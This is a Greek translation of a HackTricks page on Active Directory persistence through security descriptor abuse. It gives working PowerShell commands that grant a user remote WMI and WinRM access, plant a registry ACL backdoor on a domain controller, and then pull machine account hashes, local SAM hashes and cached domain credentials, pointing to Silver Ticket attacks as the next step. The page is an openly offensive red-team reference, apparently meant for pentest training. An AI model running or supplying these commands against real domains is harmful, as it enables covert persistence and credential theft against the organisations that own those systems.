hacktricks/windows-hardening/active-directory-methodology/security-descriptors.md
Translator workflow 35c6b081d2 Translated to Greek
2024-02-10 22:40:18 +00:00

7.6 KiB
Raw Blame History

Περιγραφείς Ασφάλειας

Μάθετε το χάκινγκ του AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!

Άλλοι τρόποι για να υποστηρίξετε το HackTricks:

Περιγραφείς Ασφάλειας

Από τα έγγραφα: Η Γλώσσα Ορισμού Περιγραφέα Ασφάλειας (SDDL) καθορίζει τη μορφή που χρησιμοποιείται για να περιγράψει έναν περιγραφέα ασφάλειας. Η SDDL χρησιμοποιεί αλφαριθμητικά ACE για το DACL και το SACL: ace_type;ace_flags;rights;object_guid;inherit_object_guid;account_sid;

Οι περιγραφείς ασφάλειας χρησιμοποιούνται για να αποθηκεύουν τα δικαιώματα που ένα αντικείμενο έχει πάνω σε ένα άλλο αντικείμενο. Εάν μπορείτε απλά να κάνετε μια μικρή αλλαγή στον περιγραφέα ασφάλειας ενός αντικειμένου, μπορείτε να αποκτήσετε πολύ ενδιαφέρουσες προνομιούχες δικαιώματα πάνω σε αυτό το αντικείμενο χωρίς να χρειάζεστε να είστε μέλος μιας προνομιούχας ομάδας.

Στη συνέχεια, αυτή η τεχνική διατήρησης βασίζεται στη δυνατότητα να κερδίσετε κάθε δικαίωμα που χρειάζεται για συγκεκριμένα αντικείμενα, ώστε να μπορείτε να εκτελέσετε μια εργασία που συνήθως απαιτεί δικαιώματα διαχειριστή χωρίς την ανάγκη να είστε διαχειριστής.

Πρόσβαση στο WMI

Μπορείτε να δώσετε σε έναν χρήστη πρόσβαση για απομακρυσμένη εκτέλεση WMI χρησιμοποιώντας αυτό:

Set-RemoteWMI -UserName student1 -ComputerName dcorp-dc namespace 'root\cimv2' -Verbose
Set-RemoteWMI -UserName student1 -ComputerName dcorp-dcnamespace 'root\cimv2' -Remove -Verbose #Remove

Πρόσβαση στο WinRM

Δώστε πρόσβαση στο winrm PS console σε έναν χρήστη χρησιμοποιώντας αυτό:

Set-RemotePSRemoting -UserName student1 -ComputerName <remotehost> -Verbose
Set-RemotePSRemoting -UserName student1 -ComputerName <remotehost> -Remove #Remove

Απομακρυσμένη πρόσβαση στις κατακερματισμένες τιμές

Αποκτήστε πρόσβαση στο μητρώο και αντλήστε τις κατακερματισμένες τιμές δημιουργώντας ένα πίσω πόρτας Reg χρησιμοποιώντας το DAMP, έτσι ώστε να μπορείτε ανά πάσα στιγμή να ανακτήσετε το κατακερματισμένο τιμή του υπολογιστή, το SAM και οποιαδήποτε προσωρινή πιστοποίηση AD στον υπολογιστή. Είναι πολύ χρήσιμο να δοθεί αυτή η άδεια σε έναν κανονικό χρήστη έναντι ενός υπολογιστή Domain Controller:

# allows for the remote retrieval of a system's machine and local account hashes, as well as its domain cached credentials.
Add-RemoteRegBackdoor -ComputerName <remotehost> -Trustee student1 -Verbose

# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the local machine account hash for the specified machine.
Get-RemoteMachineAccountHash -ComputerName <remotehost> -Verbose

# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the local SAM account hashes for the specified machine.
Get-RemoteLocalAccountHash -ComputerName <remotehost> -Verbose

# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the domain cached credentials for the specified machine.
Get-RemoteCachedCredential -ComputerName <remotehost> -Verbose

Ελέγξτε το Silver Tickets για να μάθετε πώς μπορείτε να χρησιμοποιήσετε το hash του λογαριασμού υπολογιστή ενός Domain Controller.

Μάθετε το hacking του AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!

Άλλοι τρόποι για να υποστηρίξετε το HackTricks: